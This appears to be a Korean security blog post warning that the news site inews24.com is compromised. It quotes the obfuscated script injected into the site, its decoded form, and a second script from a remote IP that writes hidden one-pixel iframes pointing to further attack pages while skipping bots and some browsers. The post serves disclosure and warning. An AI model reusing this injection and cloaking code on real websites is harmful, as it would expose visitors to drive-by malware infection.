본문 바로가기

security/악성코드 유포

http://www.inews24.com 악성코드 유포중 !

* 현재 감염된 사이트 입니다. 접속시에 감염이 될 수 있으니 유의하시기 바랍니다!


근원지 : http://www.inews24.com 내 스크립트 !


1차 연결 : http://69.46.86.221/pic/img.js


2차 아이프레임 : http://69.46.86.221/pic/img.js

~> http://69.46.86.221/pic/img.html (404 Not Found)

~> http://69.46.86.221/pic/css.html (익스플로릿 미삽입)


[inews24 내 스크립트]


function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6; i>=0 ; i-- ){if (s.charAt(curr) == ' '){tmp = tmp | (Math.pow(2,i));}curr++;}r.push(alert(tmp));}return r.join('');}if(document.cookie.indexOf("ERTDSDFF")==-1 || document.cookie.indexOf("WERXRF2")==-1)Function(RDfADFLDEXDFu5(" [중략]\n"))();var cookiename = document.cookie.indexOf("ERTDSDFF") == -1 ? "ERTDSDFF" : "WERXRF2";var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=cookiename+"=Yes;path=/;expires="+expires.toGMTString();

-----------------------------------------------------------------------------------------------


[디코딩]


100,111,99,117,109,101,110,116,46,119,114,105,116,[생략],34,41,41,59


~>document.write(unescape("%3Cscript%20sr[생략t]%3E"));

~> <script src=http://69.46.86.221/pic/img.js></script> 연결 !


[img.js 스크립트]


var DkilOy=navigator.userAgent.toLowerCase();

if(document.cookie.indexOf("AdVvKHCY")==-1 && DkilOy.indexOf("bot")==-1 && DkilOy.indexOf("spider")==-1 && DkilOy.indexOf("linux")==-1&& DkilOy.indexOf("Safari")==-1)

{

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="AdVvKHCY=Yes;path=/;expires="+expires.toGMTString();

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://69.46.86.221/pic/img.html\"></iframe>");

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://69.46.86.221/pic/css.html\"></iframe>");

}


-----------------------------------------------------------------------------------------------


http://69.46.86.221/pic/img.html


=========================

Server IP(s):

0.0.0.0

=========================

HTTP headers: 

HTTP/1.1 404 Not Found


http://69.46.86.221/pic/css.html ~> 익스플로릿 미삽입!